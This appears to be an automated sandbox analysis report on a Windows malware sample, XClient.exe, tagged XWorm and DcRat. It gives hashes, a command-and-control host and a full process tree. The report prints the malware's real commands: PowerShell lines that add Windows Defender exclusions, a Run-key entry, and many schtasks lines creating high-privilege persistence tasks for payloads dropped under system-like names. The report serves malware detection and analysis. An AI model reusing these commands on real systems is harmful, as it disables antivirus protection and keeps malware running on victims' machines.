Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
31-05-2024 04:07
Behavioral task
behavioral1
Sample
XClient.exe
Resource
win11-20240508-en
General
-
Target
XClient.exe
-
Size
72KB
-
MD5
886abac8e29288624c9cfc55dfc7d940
-
SHA1
35cf22bb640bdb7a641ce6dbb8efec00da592b0e
-
SHA256
8fcf527c18bd78b4fb4a7933eaba050826ce621f70ec6660da71607cf768f381
-
SHA512
6ae6939341612bedd320d276285b9a07884aa3ae941aac90a404d50bc696336cc278e2eee32c0a8f43782c9522a86ff1a0e89cd48fdaaf2040a074a65c0036f7
-
SSDEEP
1536:tsWNT4wTOYvKz3Gvdr4u+bXcpqmQOVXoGe6Yp2hnz/ORgRW96exN:tsa4sy7Gvd3+bXcpK2bOuWv
Malware Config
Extracted
xworm
loss-winners.gl.at.ply.gg:61007
-
Install_directory
%AppData%
-
install_file
Expensive 3.1.exe
Signatures
-
DcRat 49 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepowershell.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1376 schtasks.exe 560 schtasks.exe 4932 schtasks.exe 2504 schtasks.exe 1668 schtasks.exe 2500 schtasks.exe 2828 schtasks.exe 2472 schtasks.exe 3812 schtasks.exe 2364 schtasks.exe 1312 schtasks.exe 3748 schtasks.exe 3388 schtasks.exe 3560 schtasks.exe 2116 schtasks.exe 2200 schtasks.exe 4392 powershell.exe 640 schtasks.exe 1196 schtasks.exe 4008 schtasks.exe 3948 schtasks.exe 572 schtasks.exe 1028 schtasks.exe 3716 schtasks.exe 3516 schtasks.exe 2252 schtasks.exe 5112 schtasks.exe 1180 schtasks.exe 2624 schtasks.exe 4960 schtasks.exe 5096 schtasks.exe 4688 schtasks.exe 1580 schtasks.exe 2012 schtasks.exe 72 schtasks.exe 3592 schtasks.exe 1512 schtasks.exe 3640 schtasks.exe 3276 schtasks.exe 1864 schtasks.exe 3536 schtasks.exe 5060 schtasks.exe 1748 schtasks.exe 4536 schtasks.exe 1456 schtasks.exe 3084 schtasks.exe 1892 schtasks.exe 1904 schtasks.exe 3764 schtasks.exe -
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/568-1-0x0000000000C50000-0x0000000000C68000-memory.dmp family_xworm -
Process spawned unexpected child process 48 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3536 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3812 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2012 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1904 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4932 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 640 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1748 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3716 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 72 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2116 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5060 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2504 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1456 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3388 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4536 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3948 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2252 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1668 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3640 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3276 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2500 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2200 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3592 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2828 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3764 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2472 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1512 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4688 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1376 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5112 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3560 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1196 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1864 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1180 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1312 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 572 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2624 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3516 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3748 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 560 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3084 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4960 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1028 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4008 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2364 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1892 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5096 4192 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1580 4192 schtasks.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\uliqxd.exe dcrat C:\SavesDllcommon\fontsaves.exe dcrat behavioral1/memory/4000-72-0x00000000007D0000-0x0000000000902000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 4392 powershell.exe 2452 powershell.exe 4148 powershell.exe 1768 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
uliqxd.exefontsaves.exeSystem.exeMeatspin_FULL.exepid process 5068 uliqxd.exe 4000 fontsaves.exe 3428 System.exe 1284 Meatspin_FULL.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
XClient.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\Expensive 3.1 = "C:\\Users\\Admin\\AppData\\Roaming\\Expensive 3.1.exe" XClient.exe -
Drops file in System32 directory 2 IoCs
Processes:
fontsaves.exedescription ioc process File created C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe fontsaves.exe File created C:\Windows\SysWOW64\SMI\Manifests\29c1c3cc0f7685 fontsaves.exe -
Drops file in Program Files directory 8 IoCs
Processes:
fontsaves.exedescription ioc process File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe fontsaves.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\7a0fd90576e088 fontsaves.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe fontsaves.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\7a0fd90576e088 fontsaves.exe File created C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe fontsaves.exe File created C:\Program Files\Windows NT\TableTextService\en-US\5b884080fd4f94 fontsaves.exe File created C:\Program Files\Windows Media Player\Visualizations\explorer.exe fontsaves.exe File created C:\Program Files\Windows Media Player\Visualizations\7a0fd90576e088 fontsaves.exe -
Drops file in Windows directory 8 IoCs
Processes:
fontsaves.exedescription ioc process File created C:\Windows\Migration\WTR\5940a34987c991 fontsaves.exe File created C:\Windows\addins\csrss.exe fontsaves.exe File created C:\Windows\addins\886983d96e3d3e fontsaves.exe File created C:\Windows\ImmersiveControlPanel\pris\dllhost.exe fontsaves.exe File created C:\Windows\ImmersiveControlPanel\pris\5940a34987c991 fontsaves.exe File created C:\Windows\ServiceState\WinHttpAutoProxySvc\Data\winlogon.exe fontsaves.exe File created C:\Windows\Migration\WTR\dllhost.exe fontsaves.exe File opened for modification C:\Windows\Migration\WTR\dllhost.exe fontsaves.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 48 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4932 schtasks.exe 4008 schtasks.exe 2364 schtasks.exe 2828 schtasks.exe 3764 schtasks.exe 2116 schtasks.exe 2504 schtasks.exe 1456 schtasks.exe 4536 schtasks.exe 3948 schtasks.exe 3640 schtasks.exe 1512 schtasks.exe 3560 schtasks.exe 1864 schtasks.exe 3084 schtasks.exe 5096 schtasks.exe 1580 schtasks.exe 2252 schtasks.exe 2200 schtasks.exe 2472 schtasks.exe 1312 schtasks.exe 3748 schtasks.exe 72 schtasks.exe 3276 schtasks.exe 560 schtasks.exe 5060 schtasks.exe 1180 schtasks.exe 3592 schtasks.exe 1376 schtasks.exe 3812 schtasks.exe 2012 schtasks.exe 3716 schtasks.exe 3388 schtasks.exe 1668 schtasks.exe 2500 schtasks.exe 1196 schtasks.exe 4960 schtasks.exe 1892 schtasks.exe 3516 schtasks.exe 1028 schtasks.exe 3536 schtasks.exe 1904 schtasks.exe 640 schtasks.exe 1748 schtasks.exe 4688 schtasks.exe 5112 schtasks.exe 572 schtasks.exe 2624 schtasks.exe -
Modifies registry class 2 IoCs
Processes:
uliqxd.exefontsaves.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings uliqxd.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings fontsaves.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeXClient.exefontsaves.exeSystem.exepid process 4392 powershell.exe 4392 powershell.exe 2452 powershell.exe 2452 powershell.exe 4148 powershell.exe 4148 powershell.exe 1768 powershell.exe 1768 powershell.exe 568 XClient.exe 4000 fontsaves.exe 4000 fontsaves.exe 4000 fontsaves.exe 4000 fontsaves.exe 4000 fontsaves.exe 4000 fontsaves.exe 4000 fontsaves.exe 4000 fontsaves.exe 4000 fontsaves.exe 4000 fontsaves.exe 4000 fontsaves.exe 3428 System.exe 3428 System.exe 3428 System.exe 3428 System.exe 3428 System.exe 3428 System.exe 3428 System.exe 3428 System.exe 3428 System.exe 568 XClient.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
System.exepid process 3428 System.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
XClient.exepowershell.exepowershell.exepowershell.exepowershell.exefontsaves.exeSystem.exeAUDIODG.EXEdescription pid process Token: SeDebugPrivilege 568 XClient.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 568 XClient.exe Token: SeDebugPrivilege 4000 fontsaves.exe Token: SeDebugPrivilege 3428 System.exe Token: 33 1512 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1512 AUDIODG.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
XClient.exepid process 568 XClient.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
XClient.exeuliqxd.exeWScript.execmd.exefontsaves.execmd.exeSystem.exedescription pid process target process PID 568 wrote to memory of 4392 568 XClient.exe powershell.exe PID 568 wrote to memory of 4392 568 XClient.exe powershell.exe PID 568 wrote to memory of 2452 568 XClient.exe powershell.exe PID 568 wrote to memory of 2452 568 XClient.exe powershell.exe PID 568 wrote to memory of 4148 568 XClient.exe powershell.exe PID 568 wrote to memory of 4148 568 XClient.exe powershell.exe PID 568 wrote to memory of 1768 568 XClient.exe powershell.exe PID 568 wrote to memory of 1768 568 XClient.exe powershell.exe PID 568 wrote to memory of 5068 568 XClient.exe uliqxd.exe PID 568 wrote to memory of 5068 568 XClient.exe uliqxd.exe PID 568 wrote to memory of 5068 568 XClient.exe uliqxd.exe PID 5068 wrote to memory of 5088 5068 uliqxd.exe WScript.exe PID 5068 wrote to memory of 5088 5068 uliqxd.exe WScript.exe PID 5068 wrote to memory of 5088 5068 uliqxd.exe WScript.exe PID 5088 wrote to memory of 4360 5088 WScript.exe cmd.exe PID 5088 wrote to memory of 4360 5088 WScript.exe cmd.exe PID 5088 wrote to memory of 4360 5088 WScript.exe cmd.exe PID 4360 wrote to memory of 4000 4360 cmd.exe fontsaves.exe PID 4360 wrote to memory of 4000 4360 cmd.exe fontsaves.exe PID 4000 wrote to memory of 3552 4000 fontsaves.exe cmd.exe PID 4000 wrote to memory of 3552 4000 fontsaves.exe cmd.exe PID 3552 wrote to memory of 4920 3552 cmd.exe w32tm.exe PID 3552 wrote to memory of 4920 3552 cmd.exe w32tm.exe PID 3552 wrote to memory of 3428 3552 cmd.exe System.exe PID 3552 wrote to memory of 3428 3552 cmd.exe System.exe PID 3428 wrote to memory of 1284 3428 System.exe Meatspin_FULL.exe PID 3428 wrote to memory of 1284 3428 System.exe Meatspin_FULL.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'2⤵
- DcRat
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Expensive 3.1.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Expensive 3.1.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\uliqxd.exe"C:\Users\Admin\AppData\Local\Temp\uliqxd.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\SavesDllcommon\gdNhr8l.vbe"3⤵
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\SavesDllcommon\BRvogp3keJwY6M0FyR4uWbtTK.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\SavesDllcommon\fontsaves.exe"C:\SavesDllcommon\fontsaves.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6py5WUoJqb.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:4920
-
C:\SavesDllcommon\System.exe"C:\SavesDllcommon\System.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe"C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe"8⤵
- Executes dropped EXE
PID:1284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3812
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\SavesDllcommon\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\SavesDllcommon\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\SavesDllcommon\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:640
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\wininit.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Default User\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3716
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:72
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2504
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\spoolsv.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1456
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\unsecapp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2252
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1668
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3640
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2200
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3592
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3764
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1376
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\addins\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3560
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1196
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1864
-
